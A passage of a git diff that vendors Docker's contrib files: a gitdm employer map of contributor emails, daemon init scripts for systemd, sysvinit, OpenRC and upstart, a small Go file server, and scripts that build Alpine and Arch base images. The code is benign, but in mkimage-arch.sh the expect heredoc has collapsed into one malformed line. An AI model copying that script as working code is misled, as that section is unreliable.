+1,39 @@ +# +# Docker +# + +docker.com Docker +dotcloud.com Docker + +aluzzardi@gmail.com Docker +cpuguy83@gmail.com Docker +derek@mcgstyle.net Docker +github@gone.nl Docker +kencochrane@gmail.com Docker +mickael.laventure@gmail.com Docker +sam.alba@gmail.com Docker +svendowideit@fosiki.com Docker +svendowideit@home.org.au Docker +tonistiigi@gmail.com Docker + +cristian.staretu@gmail.com Docker < 2015-01-01 +cristian.staretu@gmail.com Cisco + +github@hollensbe.org Docker < 2015-01-01 +github@hollensbe.org Cisco + +david.calavera@gmail.com Docker < 2016-04-01 +david.calavera@gmail.com Netlify + +# +# Others +# + +cisco.com Cisco +google.com Google +ibm.com IBM +huawei.com Huawei +microsoft.com Microsoft + +redhat.com Red Hat +mrunalp@gmail.com Red Hat diff --git a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh new file mode 100755 index 0000000000..dd6a564995 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +# +# This script generates a gitdm compatible email aliases file from a git +# formatted .mailmap file. +# +# Usage: +# $> ./generate_aliases > aliases +# + +cat $1 | \ + grep -v '^#' | \ + sed 's/^[^<]*<\([^>]*\)>/\1/' | \ + grep '<.*>' | sed -e 's/[<>]/ /g' | \ + awk '{if ($3 != "") { print $3" "$1 } else {print $2" "$1}}' | \ + sort | uniq diff --git a/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config b/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config new file mode 100644 index 0000000000..d9b62b0b43 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config @@ -0,0 +1,17 @@ +# +# EmailAliases lets us cope with developers who use more +# than one address. +# +EmailAliases aliases + +# +# EmailMap does the main work of mapping addresses onto +# employers. 
+# +EmailMap domain-map + +# +# Use GroupMap to map a file full of addresses to the +# same employer +# +# GroupMap company-Docker Docker diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile new file mode 100644 index 0000000000..747dc91bcf --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile @@ -0,0 +1,4 @@ +FROM busybox +EXPOSE 80/tcp +COPY httpserver . +CMD ["./httpserver"] diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris new file mode 100644 index 0000000000..3d0d691c17 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris @@ -0,0 +1,4 @@ +FROM solaris +EXPOSE 80/tcp +COPY httpserver . +CMD ["./httpserver"] diff --git a/vendor/github.com/docker/docker/contrib/httpserver/server.go b/vendor/github.com/docker/docker/contrib/httpserver/server.go new file mode 100644 index 0000000000..a75d5abb3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/httpserver/server.go @@ -0,0 +1,12 @@ +package main + +import ( + "log" + "net/http" +) + +func main() { + fs := http.FileServer(http.Dir("/static")) + http.Handle("/", fs) + log.Panic(http.ListenAndServe(":80", nil)) +} diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd new file mode 100644 index 0000000000..244403113e --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd @@ -0,0 +1,13 @@ +# /etc/conf.d/docker: config file for /etc/init.d/docker + +# where the docker daemon output gets piped +#DOCKER_LOGFILE="/var/log/docker.log" + +# where docker's pid get stored +#DOCKER_PIDFILE="/run/docker.pid" + +# where the docker daemon itself is run from +#DOCKERD_BINARY="/usr/bin/dockerd" + +# any other random options you want to pass to docker 
+DOCKER_OPTS="" diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd new file mode 100644 index 0000000000..5d3160338a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd @@ -0,0 +1,22 @@ +#!/sbin/openrc-run +# Copyright 1999-2013 Gentoo Foundation +# Distributed under the terms of the GNU General Public License v2 + +command="${DOCKERD_BINARY:-/usr/bin/dockerd}" +pidfile="${DOCKER_PIDFILE:-/run/${RC_SVCNAME}.pid}" +command_args="-p \"${pidfile}\" ${DOCKER_OPTS}" +DOCKER_LOGFILE="${DOCKER_LOGFILE:-/var/log/${RC_SVCNAME}.log}" +start_stop_daemon_args="--background \ + --stderr \"${DOCKER_LOGFILE}\" --stdout \"${DOCKER_LOGFILE}\"" + +start_pre() { + checkpath -f -m 0644 -o root:docker "$DOCKER_LOGFILE" + + ulimit -n 1048576 + + # Having non-zero limits causes performance problems due to accounting overhead + # in the kernel. We recommend using cgroups to do container-local accounting. 
+ ulimit -u unlimited + + return 0 +} diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS b/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS new file mode 100644 index 0000000000..b9ba55b3fb --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS @@ -0,0 +1,3 @@ +Lokesh Mandvekar (@lsm5) +Brandon Philips (@philips) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service new file mode 100644 index 0000000000..8bfed93c75 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service @@ -0,0 +1,29 @@ +[Unit] +Description=Docker Application Container Engine +Documentation=https://docs.docker.com +After=network.target docker.socket firewalld.service +Requires=docker.socket + +[Service] +Type=notify +# the default is not to use systemd for cgroups because the delegate issues still +# exists and systemd currently does not support the cgroup feature set required +# for containers run by docker +ExecStart=/usr/bin/dockerd -H fd:// +ExecReload=/bin/kill -s HUP $MAINPID +LimitNOFILE=1048576 +# Having non-zero Limit*s causes performance problems due to accounting overhead +# in the kernel. We recommend using cgroups to do container-local accounting. +LimitNPROC=infinity +LimitCORE=infinity +# Uncomment TasksMax if your systemd version supports it. +# Only systemd 226 and above support this version. 
+#TasksMax=infinity +TimeoutStartSec=0 +# set delegate yes so that systemd does not reset the cgroups of docker containers +Delegate=yes +# kill only the docker process, not all processes in the cgroup +KillMode=process + +[Install] +WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm new file mode 100644 index 0000000000..6e41892399 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm @@ -0,0 +1,28 @@ +[Unit] +Description=Docker Application Container Engine +Documentation=https://docs.docker.com +After=network.target firewalld.service + +[Service] +Type=notify +# the default is not to use systemd for cgroups because the delegate issues still +# exists and systemd currently does not support the cgroup feature set required +# for containers run by docker +ExecStart=/usr/bin/dockerd +ExecReload=/bin/kill -s HUP $MAINPID +# Having non-zero Limit*s causes performance problems due to accounting overhead +# in the kernel. We recommend using cgroups to do container-local accounting. +LimitNOFILE=infinity +LimitNPROC=infinity +LimitCORE=infinity +# Uncomment TasksMax if your systemd version supports it. +# Only systemd 226 and above support this version. 
+#TasksMax=infinity +TimeoutStartSec=0 +# set delegate yes so that systemd does not reset the cgroups of docker containers +Delegate=yes +# kill only the docker process, not all processes in the cgroup +KillMode=process + +[Install] +WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket b/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket new file mode 100644 index 0000000000..7dd95098e4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket @@ -0,0 +1,12 @@ +[Unit] +Description=Docker Socket for the API +PartOf=docker.service + +[Socket] +ListenStream=/var/run/docker.sock +SocketMode=0660 +SocketUser=root +SocketGroup=docker + +[Install] +WantedBy=sockets.target diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker new file mode 100755 index 0000000000..4f9d38dda5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker @@ -0,0 +1,152 @@ +#!/bin/sh +set -e + +### BEGIN INIT INFO +# Provides: docker +# Required-Start: $syslog $remote_fs +# Required-Stop: $syslog $remote_fs +# Should-Start: cgroupfs-mount cgroup-lite +# Should-Stop: cgroupfs-mount cgroup-lite +# Default-Start: 2 3 4 5 +# Default-Stop: 0 1 6 +# Short-Description: Create lightweight, portable, self-sufficient containers. +# Description: +# Docker is an open-source project to easily create lightweight, portable, +# self-sufficient containers from any application. The same container that a +# developer builds and tests on a laptop can run at scale, in production, on +# VMs, bare metal, OpenStack clusters, public clouds and more. 
+### END INIT INFO + +export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin + +BASE=docker + +# modify these in /etc/default/$BASE (/etc/default/docker) +DOCKERD=/usr/bin/dockerd +# This is the pid file managed by docker itself +DOCKER_PIDFILE=/var/run/$BASE.pid +# This is the pid file created/managed by start-stop-daemon +DOCKER_SSD_PIDFILE=/var/run/$BASE-ssd.pid +DOCKER_LOGFILE=/var/log/$BASE.log +DOCKER_OPTS= +DOCKER_DESC="Docker" + +# Get lsb functions +. /lib/lsb/init-functions + +if [ -f /etc/default/$BASE ]; then + . /etc/default/$BASE +fi + +# Check docker is present +if [ ! -x $DOCKERD ]; then + log_failure_msg "$DOCKERD not present or not executable" + exit 1 +fi + +check_init() { + # see also init_is_upstart in /lib/lsb/init-functions (which isn't available in Ubuntu 12.04, or we'd use it directly) + if [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; then + log_failure_msg "$DOCKER_DESC is managed via upstart, try using service $BASE $1" + exit 1 + fi +} + +fail_unless_root() { + if [ "$(id -u)" != '0' ]; then + log_failure_msg "$DOCKER_DESC must be run as root" + exit 1 + fi +} + +cgroupfs_mount() { + # see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount + if grep -v '^#' /etc/fstab | grep -q cgroup \ + || [ ! -e /proc/cgroups ] \ + || [ ! -d /sys/fs/cgroup ]; then + return + fi + if ! mountpoint -q /sys/fs/cgroup; then + mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup + fi + ( + cd /sys/fs/cgroup + for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do + mkdir -p $sys + if ! mountpoint -q $sys; then + if ! 
mount -n -t cgroup -o $sys cgroup $sys; then + rmdir $sys || true + fi + fi + done + ) +} + +case "$1" in + start) + check_init + + fail_unless_root + + cgroupfs_mount + + touch "$DOCKER_LOGFILE" + chgrp docker "$DOCKER_LOGFILE" + + ulimit -n 1048576 + + # Having non-zero limits causes performance problems due to accounting overhead + # in the kernel. We recommend using cgroups to do container-local accounting. + if [ "$BASH" ]; then + ulimit -u unlimited + else + ulimit -p unlimited + fi + + log_begin_msg "Starting $DOCKER_DESC: $BASE" + start-stop-daemon --start --background \ + --no-close \ + --exec "$DOCKERD" \ + --pidfile "$DOCKER_SSD_PIDFILE" \ + --make-pidfile \ + -- \ + -p "$DOCKER_PIDFILE" \ + $DOCKER_OPTS \ + >> "$DOCKER_LOGFILE" 2>&1 + log_end_msg $? + ;; + + stop) + check_init + fail_unless_root + log_begin_msg "Stopping $DOCKER_DESC: $BASE" + start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 + log_end_msg $? + ;; + + restart) + check_init + fail_unless_root + docker_pid=`cat "$DOCKER_SSD_PIDFILE" 2>/dev/null` + [ -n "$docker_pid" ] \ + && ps -p $docker_pid > /dev/null 2>&1 \ + && $0 stop + $0 start + ;; + + force-reload) + check_init + fail_unless_root + $0 restart + ;; + + status) + check_init + status_of_proc -p "$DOCKER_SSD_PIDFILE" "$DOCKERD" "$DOCKER_DESC" + ;; + + *) + echo "Usage: service docker {start|stop|restart|status}" + exit 1 + ;; +esac diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default new file mode 100644 index 0000000000..c4e93199b4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default @@ -0,0 +1,20 @@ +# Docker Upstart and SysVinit configuration file + +# +# THIS FILE DOES NOT APPLY TO SYSTEMD +# +# Please see the documentation for "systemd drop-ins": +# https://docs.docker.com/engine/admin/systemd/ +# + +# Customize location of Docker binary (especially for 
development testing). +#DOCKERD="/usr/local/bin/dockerd" + +# Use DOCKER_OPTS to modify the daemon startup options. +#DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4" + +# If you need Docker to use an HTTP proxy, it can also be specified here. +#export http_proxy="http://127.0.0.1:3128/" + +# This is also a handy place to tweak where Docker's temporary files go. +#export DOCKER_TMPDIR="/mnt/bigdrive/docker-tmp" diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker new file mode 100755 index 0000000000..df9b02a2a4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker @@ -0,0 +1,153 @@ +#!/bin/sh +# +# /etc/rc.d/init.d/docker +# +# Daemon for docker.com +# +# chkconfig: 2345 95 95 +# description: Daemon for docker.com + +### BEGIN INIT INFO +# Provides: docker +# Required-Start: $network cgconfig +# Required-Stop: +# Should-Start: +# Should-Stop: +# Default-Start: 2 3 4 5 +# Default-Stop: 0 1 6 +# Short-Description: start and stop docker +# Description: Daemon for docker.com +### END INIT INFO + +# Source function library. +. /etc/rc.d/init.d/functions + +prog="docker" +unshare=/usr/bin/unshare +exec="/usr/bin/dockerd" +pidfile="/var/run/$prog.pid" +lockfile="/var/lock/subsys/$prog" +logfile="/var/log/$prog" + +[ -e /etc/sysconfig/$prog ] && . /etc/sysconfig/$prog + +prestart() { + service cgconfig status > /dev/null + + if [[ $? != 0 ]]; then + service cgconfig start + fi + +} + +start() { + if [ ! -x $exec ]; then + if [ ! -e $exec ]; then + echo "Docker executable $exec not found" + else + echo "You do not have permission to execute the Docker executable $exec" + fi + exit 5 + fi + + check_for_cleanup + + if ! [ -f $pidfile ]; then + prestart + printf "Starting $prog:\t" + echo "\n$(date)\n" >> $logfile + "$unshare" -m -- $exec $other_args >> $logfile 2>&1 & + pid=$! + touch $lockfile + # wait up to 10 seconds for the pidfile to exist. 
see + # https://github.com/docker/docker/issues/5359 + tries=0 + while [ ! -f $pidfile -a $tries -lt 10 ]; do + sleep 1 + tries=$((tries + 1)) + echo -n '.' + done + if [ ! -f $pidfile ]; then + failure + echo + exit 1 + fi + success + echo + else + failure + echo + printf "$pidfile still exists...\n" + exit 7 + fi +} + +stop() { + echo -n $"Stopping $prog: " + killproc -p $pidfile -d 300 $prog + retval=$? + echo + [ $retval -eq 0 ] && rm -f $lockfile + return $retval +} + +restart() { + stop + start +} + +reload() { + restart +} + +force_reload() { + restart +} + +rh_status() { + status -p $pidfile $prog +} + +rh_status_q() { + rh_status >/dev/null 2>&1 +} + + +check_for_cleanup() { + if [ -f ${pidfile} ]; then + /bin/ps -fp $(cat ${pidfile}) > /dev/null || rm ${pidfile} + fi +} + +case "$1" in + start) + rh_status_q && exit 0 + $1 + ;; + stop) + rh_status_q || exit 0 + $1 + ;; + restart) + $1 + ;; + reload) + rh_status_q || exit 7 + $1 + ;; + force-reload) + force_reload + ;; + status) + rh_status + ;; + condrestart|try-restart) + rh_status_q || exit 0 + restart + ;; + *) + echo $"Usage: $0 {start|stop|status|restart|condrestart|try-restart|reload|force-reload}" + exit 2 +esac + +exit $? 
diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig new file mode 100644 index 0000000000..0864b3d77f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig @@ -0,0 +1,7 @@ +# /etc/sysconfig/docker +# +# Other arguments to pass to the docker daemon process +# These will be parsed by the sysv initscript and appended +# to the arguments list passed to docker daemon + +other_args="" diff --git a/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS b/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS new file mode 100644 index 0000000000..03ee2dde3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS @@ -0,0 +1,2 @@ +Tianon Gravi (@tianon) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf b/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf new file mode 100644 index 0000000000..d58f7d6ac8 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf @@ -0,0 +1,72 @@ +description "Docker daemon" + +start on (filesystem and net-device-up IFACE!=lo) +stop on runlevel [!2345] + +limit nofile 524288 1048576 + +# Having non-zero limits causes performance problems due to accounting overhead +# in the kernel. We recommend using cgroups to do container-local accounting. +limit nproc unlimited unlimited + +respawn + +kill timeout 20 + +pre-start script + # see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount + if grep -v '^#' /etc/fstab | grep -q cgroup \ + || [ ! -e /proc/cgroups ] \ + || [ ! -d /sys/fs/cgroup ]; then + exit 0 + fi + if ! 
mountpoint -q /sys/fs/cgroup; then + mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup + fi + ( + cd /sys/fs/cgroup + for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do + mkdir -p $sys + if ! mountpoint -q $sys; then + if ! mount -n -t cgroup -o $sys cgroup $sys; then + rmdir $sys || true + fi + fi + done + ) +end script + +script + # modify these in /etc/default/$UPSTART_JOB (/etc/default/docker) + DOCKERD=/usr/bin/dockerd + DOCKER_OPTS= + if [ -f /etc/default/$UPSTART_JOB ]; then + . /etc/default/$UPSTART_JOB + fi + exec "$DOCKERD" $DOCKER_OPTS --raw-logs +end script + +# Don't emit "started" event until docker.sock is ready. +# See https://github.com/docker/docker/issues/6647 +post-start script + DOCKER_OPTS= + DOCKER_SOCKET= + if [ -f /etc/default/$UPSTART_JOB ]; then + . /etc/default/$UPSTART_JOB + fi + + if ! printf "%s" "$DOCKER_OPTS" | grep -qE -e '-H|--host'; then + DOCKER_SOCKET=/var/run/docker.sock + else + DOCKER_SOCKET=$(printf "%s" "$DOCKER_OPTS" | grep -oP -e '(-H|--host)\W*unix://\K(\S+)' | sed 1q) + fi + + if [ -n "$DOCKER_SOCKET" ]; then + while ! 
[ -e "$DOCKER_SOCKET" ]; do + initctl status $UPSTART_JOB | grep -qE "(stop|respawn)/" && exit 1 + echo "Waiting for $DOCKER_SOCKET" + sleep 0.1 + done + echo "$DOCKER_SOCKET is up" + fi +end script diff --git a/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh b/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh new file mode 100755 index 0000000000..2110d044d0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh @@ -0,0 +1,45 @@ +#!/bin/sh + +set -e + +errexit() { + echo "$1" + exit 1 +} + +[ "$(uname -s)" == "Darwin" ] || errexit "This script can only be used on a Mac" + +[ $# -eq 1 ] || errexit "Usage: $0 install|undo" + +BUNDLE="bundles/$(cat VERSION)" +BUNDLE_PATH="$PWD/$BUNDLE" +CLIENT_PATH="$BUNDLE_PATH/cross/darwin/amd64/docker" +DATABASE="$HOME/Library/Containers/com.docker.docker/Data/database" +DATABASE_KEY="$DATABASE/com.docker.driver.amd64-linux/bundle" + +[ -d "$DATABASE" ] || errexit "Docker for Mac must be installed for this script" + +case "$1" in +"install") + [ -d "$BUNDLE" ] || errexit "cannot find bundle $BUNDLE" + [ -e "$CLIENT_PATH" ] || errexit "you need to run make cross first" + [ -e "$BUNDLE/binary-daemon/dockerd" ] || errexit "you need to build binaries first" + [ -f "$BUNDLE/binary-client/docker" ] || errexit "you need to build binaries first" + git -C "$DATABASE" reset --hard >/dev/null + echo "$BUNDLE_PATH" > "$DATABASE_KEY" + git -C "$DATABASE" add "$DATABASE_KEY" + git -C "$DATABASE" commit -m "update bundle to $BUNDLE_PATH" + rm -f /usr/local/bin/docker + cp "$CLIENT_PATH" /usr/local/bin + echo "Bundle installed. Restart Docker to use. To uninstall, reset Docker to factory defaults." 
+ ;; +"undo") + git -C "$DATABASE" reset --hard >/dev/null + [ -f "$DATABASE_KEY" ] || errexit "bundle not set" + git -C "$DATABASE" rm "$DATABASE_KEY" + git -C "$DATABASE" commit -m "remove bundle" + rm -f /usr/local/bin/docker + ln -s "$HOME/Library/Group Containers/group.com.docker/bin/docker" /usr/local/bin + echo "Bundle removed. Using dev versions may cause issues, a reset to factory defaults is recommended." + ;; +esac diff --git a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh new file mode 100755 index 0000000000..47cd35ce62 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh @@ -0,0 +1,87 @@ +#!/bin/sh + +set -e + +[ $(id -u) -eq 0 ] || { + printf >&2 '%s requires root\n' "$0" + exit 1 +} + +usage() { + printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository]\n' "$0" + exit 1 +} + +tmp() { + TMP=$(mktemp -d ${TMPDIR:-/var/tmp}/alpine-docker-XXXXXXXXXX) + ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/alpine-docker-rootfs-XXXXXXXXXX) + trap "rm -rf $TMP $ROOTFS" EXIT TERM INT +} + +apkv() { + curl -sSL $MAINREPO/$ARCH/APKINDEX.tar.gz | tar -Oxz | + grep --text '^P:apk-tools-static$' -A1 | tail -n1 | cut -d: -f2 +} + +getapk() { + curl -sSL $MAINREPO/$ARCH/apk-tools-static-$(apkv).apk | + tar -xz -C $TMP sbin/apk.static +} + +mkbase() { + $TMP/sbin/apk.static --repository $MAINREPO --update-cache --allow-untrusted \ + --root $ROOTFS --initdb add alpine-base +} + +conf() { + printf '%s\n' $MAINREPO > $ROOTFS/etc/apk/repositories + printf '%s\n' $ADDITIONALREPO >> $ROOTFS/etc/apk/repositories +} + +pack() { + local id + id=$(tar --numeric-owner -C $ROOTFS -c . | docker import - alpine:$REL) + + docker tag $id alpine:latest + docker run -i -t --rm alpine printf 'alpine:%s with id=%s created!\n' $REL $id +} + +save() { + [ $SAVE -eq 1 ] || return + + tar --numeric-owner -C $ROOTFS -c . 
| xz > rootfs.tar.xz +} + +while getopts "hr:m:s" opt; do + case $opt in + r) + REL=$OPTARG + ;; + m) + MIRROR=$OPTARG + ;; + s) + SAVE=1 + ;; + c) + ADDITIONALREPO=community + ;; + *) + usage + ;; + esac +done + +REL=${REL:-edge} +MIRROR=${MIRROR:-http://nl.alpinelinux.org/alpine} +SAVE=${SAVE:-0} +MAINREPO=$MIRROR/$REL/main +ADDITIONALREPO=$MIRROR/$REL/community +ARCH=${ARCH:-$(uname -m)} + +tmp +getapk +mkbase +conf +pack +save diff --git a/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf b/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf new file mode 100644 index 0000000000..45fe03dc96 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf @@ -0,0 +1,92 @@ +# +# /etc/pacman.conf +# +# See the pacman.conf(5) manpage for option and repository directives + +# +# GENERAL OPTIONS +# +[options] +# The following paths are commented out with their default values listed. +# If you wish to use different paths, uncomment and update the paths. +#RootDir = / +#DBPath = /var/lib/pacman/ +#CacheDir = /var/cache/pacman/pkg/ +#LogFile = /var/log/pacman.log +#GPGDir = /etc/pacman.d/gnupg/ +HoldPkg = pacman glibc +#XferCommand = /usr/bin/curl -C - -f %u > %o +#XferCommand = /usr/bin/wget --passive-ftp -c -O %o %u +#CleanMethod = KeepInstalled +#UseDelta = 0.7 +Architecture = auto + +# Pacman won't upgrade packages listed in IgnorePkg and members of IgnoreGroup +#IgnorePkg = +#IgnoreGroup = + +#NoUpgrade = +#NoExtract = + +# Misc options +#UseSyslog +#Color +#TotalDownload +# We cannot check disk space from within a chroot environment +#CheckSpace +#VerbosePkgLists + +# By default, pacman accepts packages signed by keys that its local keyring +# trusts (see pacman-key and its man page), as well as unsigned packages. 
+SigLevel = Required DatabaseOptional +LocalFileSigLevel = Optional +#RemoteFileSigLevel = Required + +# NOTE: You must run `pacman-key --init` before first using pacman; the local +# keyring can then be populated with the keys of all official Arch Linux +# packagers with `pacman-key --populate archlinux`. + +# +# REPOSITORIES +# - can be defined here or included from another file +# - pacman will search repositories in the order defined here +# - local/custom mirrors can be added here or in separate files +# - repositories listed first will take precedence when packages +# have identical names, regardless of version number +# - URLs will have $repo replaced by the name of the current repo +# - URLs will have $arch replaced by the name of the architecture +# +# Repository entries are of the format: +# [repo-name] +# Server = ServerName +# Include = IncludePath +# +# The header [repo-name] is crucial - it must be present and +# uncommented to enable the repo. +# + +# The testing repositories are disabled by default. To enable, uncomment the +# repo name header and Include lines. You can add preferred servers immediately +# after the header, and they will be used before the default mirrors. + +#[testing] +#Include = /etc/pacman.d/mirrorlist + +[core] +Include = /etc/pacman.d/mirrorlist + +[extra] +Include = /etc/pacman.d/mirrorlist + +#[community-testing] +#Include = /etc/pacman.d/mirrorlist + +[community] +Include = /etc/pacman.d/mirrorlist + +# An example of a custom package repository. See the pacman manpage for +# tips on creating your own repositories. 
+#[custom] +#SigLevel = Optional TrustAll +#Server = file:///home/custompkgs + diff --git a/vendor/github.com/docker/docker/contrib/mkimage-arch.sh b/vendor/github.com/docker/docker/contrib/mkimage-arch.sh new file mode 100755 index 0000000000..f941177122 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-arch.sh @@ -0,0 +1,126 @@ +#!/usr/bin/env bash +# Generate a minimal filesystem for archlinux and load it into the local +# docker as "archlinux" +# requires root +set -e + +hash pacstrap &>/dev/null || { + echo "Could not find pacstrap. Run pacman -S arch-install-scripts" + exit 1 +} + +hash expect &>/dev/null || { + echo "Could not find expect. Run pacman -S expect" + exit 1 +} + + +export LANG="C.UTF-8" + +ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/rootfs-archlinux-XXXXXXXXXX) +chmod 755 $ROOTFS + +# packages to ignore for space savings +PKGIGNORE=( + cryptsetup + device-mapper + dhcpcd + iproute2 + jfsutils + linux + lvm2 + man-db + man-pages + mdadm + nano + netctl + openresolv + pciutils + pcmciautils + reiserfsprogs + s-nail + systemd-sysvcompat + usbutils + vi + xfsprogs +) +IFS=',' +PKGIGNORE="${PKGIGNORE[*]}" +unset IFS + +arch="$(uname -m)" +case "$arch" in + armv*) + if pacman -Q archlinuxarm-keyring >/dev/null 2>&1; then + pacman-key --init + pacman-key --populate archlinuxarm + else + echo "Could not find archlinuxarm-keyring. Please, install it and run pacman-key --populate archlinuxarm" + exit 1 + fi + PACMAN_CONF=$(mktemp ${TMPDIR:-/var/tmp}/pacman-conf-archlinux-XXXXXXXXX) + version="$(echo $arch | cut -c 5)" + sed "s/Architecture = armv/Architecture = armv${version}h/g" './mkimage-archarm-pacman.conf' > "${PACMAN_CONF}" + PACMAN_MIRRORLIST='Server = http://mirror.archlinuxarm.org/$arch/$repo' + PACMAN_EXTRA_PKGS='archlinuxarm-keyring' + EXPECT_TIMEOUT=1800 # Most armv* based devices can be very slow (e.g. 
RPiv1) + ARCH_KEYRING=archlinuxarm + DOCKER_IMAGE_NAME="armv${version}h/archlinux" + ;; + *) + PACMAN_CONF='./mkimage-arch-pacman.conf' + PACMAN_MIRRORLIST='Server = https://mirrors.kernel.org/archlinux/$repo/os/$arch' + PACMAN_EXTRA_PKGS='' + EXPECT_TIMEOUT=60 + ARCH_KEYRING=archlinux + DOCKER_IMAGE_NAME=archlinux + ;; +esac + +export PACMAN_MIRRORLIST + +expect < $ROOTFS/etc/locale.gen +arch-chroot $ROOTFS locale-gen +arch-chroot $ROOTFS /bin/sh -c 'echo $PACMAN_MIRRORLIST > /etc/pacman.d/mirrorlist' + +# udev doesn't work in containers, rebuild /dev +DEV=$ROOTFS/dev +rm -rf $DEV +mkdir -p $DEV +mknod -m 666 $DEV/null c 1 3 +mknod -m 666 $DEV/zero c 1 5 +mknod -m 666 $DEV/random c 1 8 +mknod -m 666 $DEV/urandom c 1 9 +mkdir -m 755 $DEV/pts +mkdir -m 1777 $DEV/shm +mknod -m 666 $DEV/tty c 5 0 +mknod -m 600 $DEV/console c 5 1 +mknod -m 666 $DEV/tty0 c 4 0 +mknod -m 666 $DEV/full c 1 7 +mknod -m 600 $DEV/initctl p +mknod -m 666 $DEV/ptmx c 5 2 +ln -sf /proc/self/fd $DEV/fd + +tar --numeric-owner --xattrs --acls -C $ROOTFS -c . | docker import - $DOCKER_IMAGE_NAME +docker run --rm -t $DOCKER_IMAGE_NAME echo Success. +rm -rf $ROOTFS diff --git a/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf b/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf new file mode 100644 index 0000000000..f4b45f54d7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf @@ -0,0 +1,98 @@ +# +# /etc/pacman.conf +# +# See the pacman.conf(5) manpage for option and repository directives + +# +# GENERAL OPTIONS +# +[options] +# The following paths are commented out with their default values listed. +# If you wish to use different paths, uncomment and update the paths. 
